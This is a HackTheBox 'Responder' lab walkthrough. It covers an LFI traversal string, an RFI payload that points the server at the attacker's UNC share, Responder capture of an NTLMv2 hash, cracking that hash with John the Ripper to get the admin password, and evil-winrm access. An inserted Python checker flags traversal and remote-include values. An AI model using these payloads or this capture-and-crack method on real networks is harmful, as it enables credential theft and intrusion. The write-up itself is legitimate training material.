HackTheBox Lab: Responder

September 17, 2025 HackTheBox Easy

Challenge Overview:

  • The following was the description for the challenge: [screenshot]

Approach

When visiting the web service using the IP address, what is the domain that we are being redirected to?
Which scripting language is being used on the server to generate webpages?
What is the name of the URL parameter which is used to load different language versions of the webpage?

  • To answer this question we need to visit the website, but we get the following error: [screenshot]
    -> When you paste the IP address into the address bar, the URL loads for a while, which matches the status code 200 we saw from the terminal, but after a while we get an error.
    -> This is where the Domain Name System (DNS) comes in. The browser first asks DNS for the IP address of the hostname in the redirect URL, and that lookup returns nothing, even when we type that URL directly into the address bar.
    -> The easy way to make this work is to add the hostname to our local hosts file.
    -> We should not expect anything from the bare IP address 10.129.6.127 either, because its source code only has HTML tags that just tell the browser to redirect to “htb” after 0 seconds.
    -> Hence, we resolve the IP 10.129.6.127 to unika.htb in /etc/hosts: [screenshot]
    • After doing so, we see some good news!!
      -> To answer the question, we navigate to the language button (highlighted in the screenshot), where I have also highlighted the answer, which is the page parameter.
    • We also see that the page is now in French. And that’s what we have to exploit.

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”?
-> The answer is ../../../../../../../../windows/system32/drivers/etc/hosts

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”?
-> The answer to this one is //10.10.14.6/somefile.
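
The same four values can be looked at from the server's side. The following is an added example, not part of the original lab or write-up: a check that labels a page value as a remote include, a path traversal, or simply not on the allowlist, and applies it to request lines. The allowlist contents, the /index.php path and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: the only files the site is meant to serve through ?page=
ALLOWED_PAGES = {"english.html", "french.html"}

def classify_page(value: str) -> str:
    """Label a raw `page` value the way a server-side check or log review would."""
    # Undo nested percent-encoding (%252e -> %2e -> .), bounded to 3 rounds
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    path = value.replace("\\", "/")  # Windows accepts both separators
    # //host/share (UNC) or scheme://host makes the server fetch from another machine
    if path.startswith("//") or re.match(r"^[a-z][a-z0-9+.-]*://", path, re.I):
        return "remote-include"
    # Parent-directory segments, absolute paths or drive letters leave the web root
    if ".." in path.split("/") or path.startswith("/") or re.match(r"^[a-z]:", path, re.I):
        return "path-traversal"
    return "allowed" if path in ALLOWED_PAGES else "not-allowlisted"

def review_requests(request_targets):
    """Return (target, label) for every request whose page value is not allowed."""
    findings = []
    for target in request_targets:
        # parse_qs decodes one layer of percent-encoding; classify_page handles the rest
        for value in parse_qs(urlsplit(target).query).get("page", []):
            label = classify_page(value)
            if label != "allowed":
                findings.append((target, label))
    return findings

# Constructed request targets: the four values from the questions above,
# plus a double-encoded, backslash form of the same hosts-file path
SAMPLE_TARGETS = [
    "/index.php?page=french.html",
    "/index.php?page=//10.10.14.6/somefile",
    "/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts",
    "/index.php?page=minikatz.exe",
    "/index.php?page=%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts",
]

if __name__ == "__main__":
    for target, label in review_requests(SAMPLE_TARGETS):
        print(f"{label:16} {target}")
```

An allowlist rejects minikatz.exe as well, even though it contains no traversal or remote path, which is why it is the safer control than pattern matching alone.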

What does NTLM stand for?
-> New Technology LAN Manager.
-> NT: Refers to the “NT” line of Microsoft Windows operating systems (e.g., Windows NT, 2000, XP, Vista, 7, 10, 11).
-> LAN: Stands for Local Area Network. This highlights its original purpose for authentication within a local network.
-> Manager: Refers to the suite of protocols that manage the authentication process.
-> We will see later how we can do this (brute-forcing).

Which flag do we use in the Responder utility to specify the network interface?

  • -I: interfaces like eth0, tun0.

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

  • John the Ripper

What is the password for the administrator user?

  • This is where we use the power of Responder.
  • Responder is a powerful post-exploitation and network penetration testing tool. Its primary purpose is to poison or abuse network protocols to capture authentication credentials from other computers on the same local network.
  • In simple terms, Responder tricks computers into handing over their password hashes by pretending to be trusted network resources.
  • Note that it is described as a post-exploitation tool, meaning there are some things we have to do before using it.
  • In this case, we first run ip a to get our network interface. Normally you would use eth0, but because I am using a VPN, I have to go for tun0.
    -> From here we take the following address (the Responder address): [screenshot]
    -> And this is how we implement the Remote File Inclusion (RFI): [screenshot]
    -> When we go back to the terminal, we see some interesting info: [screenshot]
    -> We get some credentials, including the hashed password, so now we have to crack the hash. You can use either hashcat or John the Ripper; in this case I will be using john: [screenshot]
    -> Now that we have all the information: [screenshot]
    -> We see that the cracked password is badminton, and hence that is our answer.

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?

Submit root flag

  • Now that we have the credentials, we can remotely access the machine.
  • We do this with the evil-winrm tool, which you can install as follows:
    sudo gem install evil-winrm